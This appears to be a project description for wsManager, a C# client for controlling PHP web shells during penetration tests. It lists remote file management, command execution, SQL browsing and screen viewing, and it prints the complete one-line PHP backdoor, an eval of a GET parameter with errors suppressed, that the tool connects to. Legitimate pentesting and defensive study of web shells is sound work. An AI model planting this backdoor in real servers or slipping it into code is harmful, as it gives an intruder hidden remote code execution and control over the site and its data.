wsManager: Webshell Manager
wsManager (Webshell Manager) can be used to quickly execute commands on a server while pentesting a PHP application. The client interface is written in C#, which operate using a simple web-based backdoor implemented by the user himself.
Once uploaded, the web shell can be accessed by the client at any time. Once successfully connected, the user proceeds to manipulate files and data on the webserver.
The server-side code is extremely simple and contains just a single line of code :
<?php @eval($_GET["x"]); ?>
Many commands and control features:
- File manager (upload, download, archiver, etc)
- Command execution
- SQL Explorer
- Screen Viewer (Windows only)
Changelog
04/04/2019
- HTTPS Support
- PHP Code Execution
Download
Copyright (C) 2019 guillaC